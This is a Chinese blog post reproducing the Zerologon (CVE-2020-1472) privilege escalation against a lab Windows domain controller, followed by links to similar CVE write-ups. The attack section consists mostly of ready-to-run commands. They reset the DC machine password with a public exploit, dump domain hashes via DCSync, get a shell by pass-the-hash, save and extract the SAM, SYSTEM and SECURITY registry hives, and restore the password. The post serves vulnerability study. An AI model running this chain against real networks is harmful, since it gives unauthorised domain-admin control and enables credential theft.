CVE-2020-1472漏洞復現

阿新 • • 發佈：2020-09-16

摘要

2020年08月12日，Windows官方釋出了 NetLogon 特權提升漏洞 的風險通告，該漏洞編號為 CVE-2020-1472，漏洞等級：嚴重，漏洞評分：10分

攻擊者通過NetLogon（MS-NRPC），建立與域控間易受攻擊的安全通道時，可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設計的應用程式

影響版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

復現環境

域內DC

版本:Windows Server 2008 R2 64位
ip:192.168.111.130
Blosname:WIN-03OO218S5B8

攻擊機器

Macos
python3
impacket使用這個 https://github.com/SecureAuthCorp/impacket  (下載後 sudo pip3 install .)
重置域內管理員密碼poc https://github.com/dirkjanm/CVE-2020-1472
恢復密碼poc https://github.com/risksense/zerologon

復現開始

首先使用POC重置管理員金鑰

python3 cve-2020-1472-exploit.py WIN-03OO218S5B8 192.168.111.130

通過 Dcsync 檢視密碼hash

secretsdump.py Mikasa.com/WIN-03OO218S5B8\[email protected] -just-dc -no-pass

通過wmiexec獲取到Shell

wmiexec.py Mikasa.com/[email protected] -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

但是我這裡不行,因為我的密碼過期了,所以強制我更新密碼(我就是忘了密碼才復現這個漏洞的),但是我們已經修改為空了,我們進入把密碼改後才能其他的就行了(這個我改為 pass@123 ntlm就是51a52c415264a8fc31520f66f2f50459)
wmiexec.py Mikasa.com/[email protected] -hashes :51a52c415264a8fc31520f66f2f50459

密碼復原操作

備份登錄檔

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

使用secretsdump解析儲存在本地的nt hash

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

最後執行risksense的恢復指令碼將$MACHINE.ACC:plain_password_hex中的原來nt hash恢復

python3 reinstall_original_pw.py WIN-03OO218S5B8 192.168.111.130 9c17abbf4129364354dbdb0109be6fbfa01164a8c5e96703c78821ef1b95da8be766de10c84d99b591488cce5c2b18465d43ada98e3178d99553a66a1a0e983f6954cfd1b6fe9044ea8cb0ffac81dacd135d3b289cc001adc8b9fc54e1f4aa89d8bfc23a9dd8f59662cf81e5d1adf7b37f457729f6f444f58b5d715bbbdcae81e270b27cefc8c3193ef808b70fceb66261c968d71689d3ac2f3af6f18bd43b46faa1160eabacddbcd0c6d50e81548ccdecde2748e178dcaa13c0abc93bcb3e8ea1859aabb0a0be213b52c2bcf8350ba5d792ecbae99cf6b6170a0cbb4d5fd99eee09490c6cb7b5b5db409aa0b92a5a29

復現完成!

思考

這個漏洞的影響確實很大,只需要與域控建立TCP連線即可拿下域控(有當初永恆之藍那味了)

參考連結

https://www.cnblogs.com/goabout2/p/13676527.html

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/risksense/zerologon

微軟NetLogon許可權提升 CVE-2020-1472 漏洞復現

簡介 NetLogon 遠端協議是一種在 Windows 域控上使用的 RPC 介面,被用於各種與使用者和機器認證相關的任務。最常用於讓使用者使用 NTLM 協議登入伺服器，也用於 NTP 響應認證以及更新計算機域密碼

CVE-2020-1472漏洞復現

摘要 2020年08月12日，Windows官方釋出了 NetLogon 特權提升漏洞的風險通告，該漏洞編號為 CVE-2020-1472，漏洞等級：嚴重，漏洞評分：10分

CVE-2020-2555漏洞復現&&流量分析

CVE-2020-2555漏洞復現&&流量分析一、準備環境 windows7:weblogic 12.2.1.4.0 JDK版本為jdk-8u261

CVE-2020-2883漏洞復現&&流量分析

CVE-2020-2883漏洞復現&&流量分析寫在前面網上大佬說CVE-2020-2883是CVE-2020-2555的繞過，下面就復現了抓包看看吧。

ZeroLogon(CVE-2020-1472) 漏洞的攻擊與防禦策略（下）

上文我們介紹了攻擊原理，本文我們將詳細介紹可以發起的攻擊種類和防禦措施。

Struts2 S2-061(CVE-2020-17530)漏洞復現

0x00 漏洞簡介Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530)，在使用某些tag等情況下可能存在OGNL表示式注

Victor CMS 未授權sql注入(CVE-2020-29280)漏洞復現

0X00簡介 The Victor CMS v1.0版本存在安全漏洞，該漏洞源於通過search.php頁面上的“search”引數造成的。

《永恆之黑》CVE-2020-0796漏洞復現

《永恆之黑》CVE-2020-0796漏洞復現漏洞簡介 2020年3月12日，微軟正式釋出CVE-2020-0796高危漏洞補丁，本漏洞源於SMBv3沒有正確處理壓縮的資料包，在解壓資料包的時候使用客戶端傳過來的長度進行解壓時，並沒有

CVE-2020-1938與CVE-2020-13935漏洞復現

前言最近在騰訊雲上買了個伺服器，準備用來學習。在安裝了7.0.76的tomcat後，騰訊雲提醒我存在兩個漏洞，分別是CVE-2020-1938和CVE-2020-13935，在修復完漏洞後，準備復現一下這兩個漏洞，於是就有了這篇隨筆。

cve-2020-1472，netlogon特權提升漏洞復現

cve-2020-1472,netlogon特權提升漏洞，漏洞原理：攻擊者通過NetLogon（MS-NRPC），建立與域控間易受攻擊的安全通道時，可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設

CVE-2020-1472 | Netlogon 特權提升漏洞預警

CVE-2020-1472 | Netlogon 特權提升漏洞預警 0x01 簡介 CNVD:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202008-548

Ladon外掛-CVE-2020-1472域控提權漏洞EXP

漏洞簡述 2020年08月12日， 360CERT監測發現Windows官方釋出了 NetLogon 特權提升漏洞的風險通告，該漏洞編號為 CVE-2020-1472，漏洞等級：嚴重，漏洞評分：10分。

Weblogic未授權遠端命令執行漏洞（CVE-2020-14882&CVE-2020-14883）復現

Weblogic是Oracle公司推出的J2EE應用伺服器，CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺，CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈，可通

weblogic 未授權命令執行漏洞（CVE-2020-14882,CVE-2020-14883）復現

漏洞描述 2020年10月29日，360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ，漏洞等級：嚴重，漏洞評分：9.8。遠端攻擊者可以構造特殊的HTTP請求，在未經身

Apache Ofbiz xmlrpc RCE漏洞（CVE-2020-9496）復現

Apache Ofbiz xmlrpc RCE漏洞（CVE-2020-9496）復現簡介 Apache OFBiz全稱是The ApacheOpen For Business Project，是開一個放的電子商務平臺，也是一個非常著名的開源專案

Webmin 命令執行漏洞（CVE-2020-35606）--- 復現

漏洞繞過針對採取的措施 CVE-2019-12840 並將其轉換為新向量。供應商尚未修復此漏洞。

Webmin 命令執行漏洞（CVE-2020-35606）---復現

CVE-Mitre 連結下載 webmin_pu_escape_bypass_rce.rb (Metasploit) 漏洞簡介：該模組利用 Webmin 1.962 及更低版本中的任意命令執行漏洞。任何授權“包更新”模組的使用者都可以使用 root 許可權執行任意命令。

CVE-2020-5902 簡單復現

這幾天通報了f5的一個漏洞，想著先弄個環境儲存著，說不定後面就用到了。。

【vulhub】Weblogic CVE-2017-10271漏洞復現&&流量分析

Weblogic CVE-2017-10271 漏洞復現&&流量分析 Weblogic CVE-2017-10271 XMLDecoder反序列化

Yii2反序列化（CVE-2020-15148）復現

為了方便安裝，直接在github（https://github.com/yiisoft/yii2）下載一個release的低版本，然後解壓tgz檔案到phpstudy的www的目錄下，命名為Yii2:

CVE-2020-1472漏洞復現

摘要

復現環境

復現開始

密碼復原操作

思考

參考連結

相關推薦